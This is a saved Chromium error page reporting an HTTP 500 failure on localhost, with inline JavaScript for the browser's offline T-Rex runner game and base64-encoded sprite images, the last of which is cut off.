   * @param {number} width Canvas width.
   * @param {number} height Canvas height.
   */
  resize(width, height) {
    this.canvas.width = width;
    this.canvas.height = height;
  },

  /**
   * Add a new cloud to the horizon.
   */
  addCloud() {
    this.clouds.push(new Cloud(this.canvas, this.spritePos.CLOUD,
        this.dimensions.WIDTH));
  },

  /**
   * Add a random background element to the horizon.
   */
  addBackgroundEl() {
    const backgroundElTypes =
        Object.keys(Runner.spriteDefinition.BACKGROUND_EL);

    if (backgroundElTypes.length > 0) {
      let index = getRandomNum(0, backgroundElTypes.length - 1);
      let type = backgroundElTypes[index];

      // Add variation if available.
      while (type == this.lastEl && backgroundElTypes.length > 1) {
        index = getRandomNum(0, backgroundElTypes.length - 1);
        type = backgroundElTypes[index];
      }

      this.lastEl = type;
      this.backgroundEls.push(new BackgroundEl(
          this.canvas, this.spritePos.BACKGROUND_EL, this.dimensions.WIDTH,
          type));
    }
  },
};
</script>
  <script>// Copyright 2021 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

/* @const
 * Add matching sprite definition and config to Runner.spriteDefinitionByType.
 */
const GAME_TYPE = [];

/**
 * Obstacle definitions.
 * minGap: minimum pixel space between obstacles.
 * multipleSpeed: Speed at which multiples are allowed.
 * speedOffset: speed faster / slower than the horizon.
 * minSpeed: Minimum speed which the obstacle can make an appearance.
 *
 * @typedef {{
 *   type: string,
 *   width: number,
 *   height: number,
 *   yPos: number,
 *   multipleSpeed: number,
 *   minGap: number,
 *   minSpeed: number,
 *   collisionBoxes: Array<CollisionBox>,
 * }}
 */
let ObstacleType;

/**
 * T-Rex runner sprite definitions.
 */
Runner.spriteDefinitionByType = {
  original: {
    LDPI: {
      BACKGROUND_EL: {x: 86, y: 2},
      CACTUS_LARGE: {x: 332, y: 2},
      CACTUS_SMALL: {x: 228, y: 2},
      OBSTACLE_2: {x: 332, y: 2},
      OBSTACLE: {x: 228, y: 2},
      CLOUD: {x: 86, y: 2},
      HORIZON: {x: 2, y: 54},
      MOON: {x: 484, y: 2},
      PTERODACTYL: {x: 134, y: 2},
      RESTART: {x: 2, y: 68},
      TEXT_SPRITE: {x: 655, y: 2},
      TREX: {x: 848, y: 2},
      STAR: {x: 645, y: 2},
      COLLECTABLE: {x: 2, y: 2},
      ALT_GAME_END: {x: 121, y: 2},
    },
    HDPI: {
      BACKGROUND_EL: {x: 166, y: 2},
      CACTUS_LARGE: {x: 652, y: 2},
      CACTUS_SMALL: {x: 446, y: 2},
      OBSTACLE_2: {x: 652, y: 2},
      OBSTACLE: {x: 446, y: 2},
      CLOUD: {x: 166, y: 2},
      HORIZON: {x: 2, y: 104},
      MOON: {x: 954, y: 2},
      PTERODACTYL: {x: 260, y: 2},
      RESTART: {x: 2, y: 130},
      TEXT_SPRITE: {x: 1294, y: 2},
      TREX: {x: 1678, y: 2},
      STAR: {x: 1276, y: 2},
      COLLECTABLE: {x: 4, y: 4},
      ALT_GAME_END: {x: 242, y: 4},
    },
    MAX_GAP_COEFFICIENT: 1.5,
    MAX_OBSTACLE_LENGTH: 3,
    HAS_CLOUDS: 1,
    BOTTOM_PAD: 10,
    TREX: {
      WAITING_1: {x: 44, w: 44, h: 47, xOffset: 0},
      WAITING_2: {x: 0, w: 44, h: 47, xOffset: 0},
      RUNNING_1: {x: 88, w: 44, h: 47, xOffset: 0},
      RUNNING_2: {x: 132, w: 44, h: 47, xOffset: 0},
      JUMPING: {x: 0, w: 44, h: 47, xOffset: 0},
      CRASHED: {x: 220, w: 44, h: 47, xOffset: 0},
      COLLISION_BOXES: [
        new CollisionBox(22, 0, 17, 16),
        new CollisionBox(1, 18, 30, 9),
        new CollisionBox(10, 35, 14, 8),
        new CollisionBox(1, 24, 29, 5),
        new CollisionBox(5, 30, 21, 4),
        new CollisionBox(9, 34, 15, 4),
      ],
    },
    /** @type {Array<ObstacleType>} */
    OBSTACLES: [
      {
        type: 'CACTUS_SMALL',
        width: 17,
        height: 35,
        yPos: 105,
        multipleSpeed: 4,
        minGap: 120,
        minSpeed: 0,
        collisionBoxes: [
          new CollisionBox(0, 7, 5, 27),
          new CollisionBox(4, 0, 6, 34),
          new CollisionBox(10, 4, 7, 14),
        ],
      },
      {
        type: 'CACTUS_LARGE',
        width: 25,
        height: 50,
        yPos: 90,
        multipleSpeed: 7,
        minGap: 120,
        minSpeed: 0,
        collisionBoxes: [
          new CollisionBox(0, 12, 7, 38),
          new CollisionBox(8, 0, 7, 49),
          new CollisionBox(13, 10, 10, 38),
        ],
      },
      {
        type: 'PTERODACTYL',
        width: 46,
        height: 40,
        yPos: [100, 75, 50],    // Variable height.
        yPosMobile: [100, 50],  // Variable height mobile.
        multipleSpeed: 999,
        minSpeed: 8.5,
        minGap: 150,
        collisionBoxes: [
          new CollisionBox(15, 15, 16, 5),
          new CollisionBox(18, 21, 24, 6),
          new CollisionBox(2, 14, 4, 3),
          new CollisionBox(6, 10, 4, 7),
          new CollisionBox(10, 8, 6, 9),
        ],
        numFrames: 2,
        frameRate: 1000 / 6,
        speedOffset: .8,
      },
    ],
    BACKGROUND_EL: {
      'CLOUD': {
        HEIGHT: 14,
        MAX_CLOUD_GAP: 400,
        MAX_SKY_LEVEL: 30,
        MIN_CLOUD_GAP: 100,
        MIN_SKY_LEVEL: 71,
        OFFSET: 4,
        WIDTH: 46,
        X_POS: 1,
        Y_POS: 120,
      },
    },
    BACKGROUND_EL_CONFIG: {
      MAX_BG_ELS: 1,
      MAX_GAP: 400,
      MIN_GAP: 100,
      POS: 0,
      SPEED: 0.5,
      Y_POS: 125,
    },
    LINES: [
      {SOURCE_X: 2, SOURCE_Y: 52, WIDTH: 600, HEIGHT: 12, YPOS: 127},
    ],
  },
};
</script>
  
</head>
<body id="t" class="neterror" style="font-family: &quot;sans&quot;, Arial, sans-serif; font-size: 75%" jstcache="0">
  <div id="main-frame-error" class="interstitial-wrapper" jstcache="0">
    <div id="main-content" jstcache="0">
      <div class="icon icon-generic" jstcache="0"></div>
      <div id="main-message" jstcache="0">
        <h1 jstcache="0">
          <span jsselect="heading" jsvalues=".innerHTML:msg" jstcache="9">This page isn’t working</span>
          <a id="error-information-button" class="hidden" onclick="toggleErrorInformationPopup();" jstcache="0"></a>
        </h1>
        <p jsselect="summary" jsvalues=".innerHTML:msg" jstcache="1"><strong jscontent="hostName" jstcache="22">localhost</strong> is currently unable to handle this request.</p>
        <!--The suggestion list and error code are normally presented inline,
          in which case error-information-popup-* divs have no effect. When
          error-information-popup-container has the use-popup-container class, this
          information is provided in a popup instead.-->
        <div id="error-information-popup-container" jstcache="0">
          <div id="error-information-popup" jstcache="0">
            <div id="error-information-popup-box" jstcache="0">
              <div id="error-information-popup-content" jstcache="0">
                <div id="suggestions-list" style="display:none" jsdisplay="(suggestionsSummaryList &amp;&amp; suggestionsSummaryList.length)" jstcache="16">
                  <p jsvalues=".innerHTML:suggestionsSummaryListHeader" jstcache="18"></p>
                  <ul jsvalues=".className:suggestionsSummaryList.length == 1 ? 'single-suggestion' : ''" jstcache="19">
                    <li jsselect="suggestionsSummaryList" jsvalues=".innerHTML:summary" jstcache="21"></li>
                  </ul>
                </div>
                <div class="error-code" jscontent="errorCode" jstcache="17">HTTP ERROR 500</div>
                <p id="error-information-popup-close" jstcache="0">
                  <a class="link-button" jscontent="closeDescriptionPopup" onclick="toggleErrorInformationPopup();" jstcache="20">null</a>
                </p>
              </div>
            </div>
          </div>
        </div>
        <div id="download-links-wrapper" class="hidden" jstcache="0">
          <div id="download-link-wrapper" jstcache="0">
            <a id="download-link" class="link-button" onclick="downloadButtonClick()" jsselect="downloadButton" jscontent="msg" jsvalues=".disabledText:disabledMsg" jstcache="6" style="display: none;">
            </a>
          </div>
          <div id="download-link-clicked-wrapper" class="hidden" jstcache="0">
            <div id="download-link-clicked" class="link-button" jsselect="downloadButton" jscontent="disabledMsg" jstcache="11" style="display: none;">
            </div>
          </div>
        </div>
        <div id="save-page-for-later-button" class="hidden" jstcache="0">
          <a class="link-button" onclick="savePageLaterClick()" jsselect="savePageLater" jscontent="savePageMsg" jstcache="10" style="display: none;">
          </a>
        </div>
        <div id="cancel-save-page-button" class="hidden" onclick="cancelSavePageClick()" jsselect="savePageLater" jsvalues=".innerHTML:cancelMsg" jstcache="4" style="display: none;">
        </div>
        <div id="offline-content-list" class="list-hidden" hidden="" jstcache="0">
          <div id="offline-content-list-visibility-card" onclick="toggleOfflineContentListVisibility(true)" jstcache="0">
            <div id="offline-content-list-title" jsselect="offlineContentList" jscontent="title" jstcache="12" style="display: none;">
            </div>
            <div jstcache="0">
              <div id="offline-content-list-show-text" jsselect="offlineContentList" jscontent="showText" jstcache="14" style="display: none;">
              </div>
              <div id="offline-content-list-hide-text" jsselect="offlineContentList" jscontent="hideText" jstcache="15" style="display: none;">
              </div>
            </div>
          </div>
          <div id="offline-content-suggestions" jstcache="0"></div>
          <div id="offline-content-list-action" jstcache="0">
            <a class="link-button" onclick="launchDownloadsPage()" jsselect="offlineContentList" jscontent="actionText" jstcache="13" style="display: none;">
            </a>
          </div>
        </div>
      </div>
    </div>
    <div id="buttons" class="nav-wrapper suggested-right" jstcache="0">
      <div id="control-buttons" jstcache="0">
        <button id="reload-button" class="blue-button text-button" onclick="reloadButtonClick(this.url);" jsselect="reloadButton" jsvalues=".url:reloadUrl" jscontent="msg" jstcache="5">Reload</button>
        <button id="download-button" class="blue-button text-button" onclick="downloadButtonClick()" jsselect="downloadButton" jscontent="msg" jsvalues=".disabledText:disabledMsg" jstcache="6" style="display: none;">
        </button>
      </div>
      <button id="details-button" class="secondary-button text-button small-link" onclick="detailsButtonClick(); toggleHelpBox()" jscontent="details" jsdisplay="(suggestionsDetails &amp;&amp; suggestionsDetails.length > 0) || diagnose" jsvalues=".detailsText:details; .hideDetailsText:hideDetails;" jstcache="2" style="display: none;"></button>
    </div>
    <div id="details" class="hidden" jstcache="0">
      <div class="suggestions" jsselect="suggestionsDetails" jstcache="3" jsinstance="*0" style="display: none;">
        <div class="suggestion-header" jsvalues=".innerHTML:header" jstcache="7"></div>
        <div class="suggestion-body" jsvalues=".innerHTML:body" jstcache="8"></div>
      </div>
    </div>
  </div>
  <div id="sub-frame-error" jstcache="0">
    <!-- Show details when hovering over the icon, in case the details are
         hidden because they're too large. -->
    <div class="icon" jstcache="0"></div>
    <div id="sub-frame-error-details" jsselect="summary" jsvalues=".innerHTML:msg" jstcache="1"><strong jscontent="hostName" jstcache="22">localhost</strong> is currently unable to handle this request.</div>
  </div>

  <div id="offline-resources" jstcache="0">
    <img id="offline-resources-1x" src="data:image/png;base64,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" jstcache="0">
    <img id="offline-resources-2x" src="data:image/png;base64,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